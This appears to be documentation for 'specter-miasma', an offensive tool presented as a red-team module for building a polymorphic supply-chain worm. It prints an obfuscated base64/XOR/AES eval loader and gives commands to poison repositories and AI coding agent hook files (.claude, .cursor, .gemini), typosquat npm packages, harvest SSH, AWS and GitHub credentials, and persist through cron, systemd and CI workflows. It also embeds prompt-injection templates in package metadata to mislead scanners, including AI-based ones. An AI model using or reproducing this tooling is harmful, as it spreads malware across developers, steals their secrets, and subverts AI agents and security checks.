Install
pip install git+https://github.com/RichardBarron27/red-specter-specter-miasma.git specter-miasma --help
Dependencies: click, cryptography, pynacl, requests, gitpython. Python 3.10+.
Gate Tiers
| Gate | Flag / Env | Subsystems |
|---|---|---|
| OPEN | none | ENUMERATE-TARGETS, scan_content() |
| INJECT | MIASMA_INJECT_KEY env | POISON-REPO, PUBLISH-PACKAGE, EVADE-SCANNERS |
| MUTATE | --mutate flag | FORGE-PAYLOAD, MUTATE-PAYLOAD |
| UNLEASHED | --confirm-destroy + MIASMA_SIGNING_KEY env | PROPAGATE-WORM, HARVEST-CREDENTIALS, PERSIST-WORM |
MUTATE is a preparation gate. It is required before injection. --mutate explicitly acknowledges you are generating live polymorphic worm payload for an authorised engagement.
Polymorphic Pipeline
FORGE-PAYLOAD orchestrates five stages in sequence. Each stage receives the output of the previous one. Seed determines all randomness — same integer seed produces identical output on every invocation.
| Stage | File | Operation | Output |
|---|---|---|---|
| 1 | encryptor.py | AES-256-GCM per-file encryption via HKDF | key_hex, nonce_hex, ciphertext_hex |
| 2 | obfuscator.py | Random comment injection (density=8) | Augmented source |
| 3 | mutator.py | Variable rename (16 identifiers, seeded suffix) | Transformed source |
| 4 | obfuscator.py | Dead vars + string split + IIFE wrap | Obfuscated JS |
| 5 | mutator.py | Three-layer loader: base64 → XOR → AES → eval() | loader.js, loader.py, binding.gyp |
HKDF Key Derivation
seed_bytes = HKDF(input_key_material=seed, salt=b"miasma-seed", info=b"", length=32) aes_key = HKDF(seed_bytes, salt=b"miasma-aes-key", info=str(file_index).encode(), length=32) aes_nonce = HKDF(seed_bytes, salt=b"miasma-aes-nonce", info=str(file_index).encode(), length=12) xor_key = HKDF(seed_bytes, salt=b"miasma-xor-key", info=b"", length=32)
Three-Layer Loader (JS)
(function(){
var _d1=0, _d2=false; // dead vars
var _b64 = "BASE64_ENCODED_XOR_ENCRYPTED_AESENCRYPTED_PAYLOAD";
var _xk = [/* 32-byte XOR key array */];
var _xa = atob(_b64).split('').map((c,i) => String.fromCharCode(c.charCodeAt(0)^_xk[i%32])).join('');
var _c = require('crypto').createDecipheriv('aes-256-gcm', Buffer.from('AES_KEY_HEX','hex'), Buffer.from('NONCE_HEX','hex'));
_c.setAuthTag(Buffer.from('TAG_HEX','hex'));
var _p = Buffer.concat([_c.update(Buffer.from(_xa,'hex')), _c.final()]);
eval(_p.toString());
})();
ENUMERATE-TARGETS
specter-miasma enumerate [--output ./target-profile.json]
Discovers all AI coding agents, package managers, git repos, CI/CD config, and credential locations. Returns TargetProfile. No network connections. OPEN gate — no key required.
FORGE-PAYLOAD
specter-miasma forge --seed 42 --output ./worm/ specter-miasma forge --seed random --output ./worm/ # unique per run
Runs all 5 pipeline stages. Writes to output_dir: loader.js (three-layer IIFE), loader.py (Python exec wrapper), binding.gyp (native compile target), metadata.json (keys + hashes). Requires --mutate flag (MUTATE gate).
POISON-REPO
export MIASMA_INJECT_KEY="$(cat ~/.config/red-specter/miasma-inject.key)" specter-miasma poison --repo-path ./target-repo/ --payload ./worm/
Injects 8 vectors: package.json hooks, .claude/settings.json Stop+PostToolUse, .cursorrules, .gemini/settings.json, miasma.pth, binding.gyp, loader.js, loader.py. Zero-width non-joiner (U+200C) inserted after exec/eval/require/fetch in loader.js. INJECT gate.
PUBLISH-PACKAGE
# Dry run (default) — builds manifest only specter-miasma publish --registry npm --package lodash --strategy typosquat --payload ./worm/ --dry-run # Live publish (INJECT gate) — requires VERDACCIO_URL or DEVPI_URL export VERDACCIO_URL="http://verdaccio.internal:4873" specter-miasma publish --registry npm --package lodash --strategy typosquat --payload ./worm/
PROPAGATE-WORM
export MIASMA_SIGNING_KEY="$(cat ~/.config/red-specter/miasma-signing.key)" specter-miasma propagate \ --scan-root . \ --payload ./worm/ \ --signing-key ~/.config/red-specter/miasma-signing.key \ --confirm-destroy \ --exclude /path/to/skip
UNLEASHED gate. Discovers all git repos, skips already-poisoned (checks "MIASMA" in loader.js), injects each fresh repo, injects GitHub Actions workflows. blast_radius.estimated_downstream_devs = repos × 12.
HARVEST-CREDENTIALS
specter-miasma harvest --scan-root . --signing-key ./signing.key --confirm-destroy
UNLEASHED gate. Scans env vars, system credential paths (~/.ssh/id_ed25519, ~/.config/gh/hosts.yml, ~/.aws/credentials, etc.), and .env* files. 11 regex patterns including github_token, aws_access_key_id, anthropic_api_key, ssh_private_key. scan_content() is public (OPEN gate) for inline scanning.
PERSIST-WORM
specter-miasma persist --install-root . --payload ./worm/ --signing-key ./signing.key --confirm-destroy
UNLEASHED gate. 7 mechanisms: Python .pth (site-packages), .claude/settings.json Stop hook, .cursor/rules, .gemini/settings.json hook, cron (@reboot + */30), systemd timer (OnBootSec=5min, OnUnitActiveSec=30min), GitHub Actions backdoor. survival_guaranteed = True when ≥4 installed.
EVADE-SCANNERS
specter-miasma evade --payload ./worm/ --seed 42 --techniques zero_width,homoglyphs,prompt_injection
INJECT gate. 6 prompt injection templates embedded in package.json description field. Zero-width non-joiner (U+200C) after sensitive keywords. Homoglyph substitution at 15% rate (Cyrillic a/e/o/p/c, Greek o). Multi-stage base64 split: payload halved, each base64-encoded, combined with atob(_sa)+atob(_sb) in eval.
MUTATE-PAYLOAD
specter-miasma mutate --payload ./worm/ --new-seed 99 --output ./worm-v2/ --mutate
MUTATE gate. Regenerates from new seed. Validates: hash_differs, loader_js_differs, aes_key_differs, xor_key_differs, b64_differs — all True for any seed difference. 100 sequential seeds → 100 unique payload hashes (validated in test suite).
Report Format
{
"report_id": "MIA-a3f1c9d82e40",
"module": "T151 SPECTER MIASMA",
"version": "1.0.0",
"timestamp": "2026-06-19T14:23:11.000Z",
"target_profile": { "agents": ["claude_code", "cursor"], ... },
"payload": { "payload_hash": "sha256hex...", "mutator_seed": 42, "files": [...] },
"repos_poisoned": ["/home/dev/my-app", ...],
"packages_published": ["lodash-utils@1.0.1"],
"credentials_harvested": { "total_found": 3, "credentials": [...] },
"persistence_mechanisms": [{"type": "python_pth"}, ...],
"evasion_techniques": ["zero_width", "homoglyphs", "prompt_injection"],
"mutation_records": [{"old_seed": 42, "new_seed": 99, ...}],
"blast_radius": {
"repos_poisoned": 5,
"packages_published": 1,
"persistence_count": 4,
"estimated_downstream_devs": 60
},
"mitre_attack": ["T1195", "T1195.001", "T1195.002", "T1078", "T1098", "T1528", "T1552"],
"mitre_atlas": ["AML.T0018", "AML.T0040", "AML.T0054"],
"wmd_classes": ["polymorphic_supply_chain_worm", "ai_agent_config_backdoor", ...],
"kill_chain_summary": "ENUMERATE-TARGETS > FORGE-PAYLOAD > POISON-REPO > PUBLISH-PACKAGE > PROPAGATE-WORM > HARVEST-CREDENTIALS > PERSIST-WORM > EVADE-SCANNERS > MUTATE-PAYLOAD",
"signature": "ed25519_hex_128_chars_or_null"
}
MITRE Coverage
| ID | Name | Subsystem |
|---|---|---|
| T1195 | Supply Chain Compromise | PUBLISH-PACKAGE |
| T1195.001 | Compromise Software Dependencies | POISON-REPO |
| T1195.002 | Compromise Software Supply Chain | PROPAGATE-WORM |
| T1078 | Valid Accounts | HARVEST-CREDENTIALS (OIDC) |
| T1098 | Account Manipulation | PUBLISH-PACKAGE (SLSA) |
| T1528 | Steal Application Access Token | HARVEST-CREDENTIALS |
| T1552 | Unsecured Credentials | HARVEST-CREDENTIALS |
| AML.T0018 | Backdoor ML Model | POISON-REPO (.claude hooks) |
| AML.T0040 | ML Supply Chain Compromise | FORGE-PAYLOAD + PUBLISH-PACKAGE |
| AML.T0054 | LLM Jailbreak | EVADE-SCANNERS |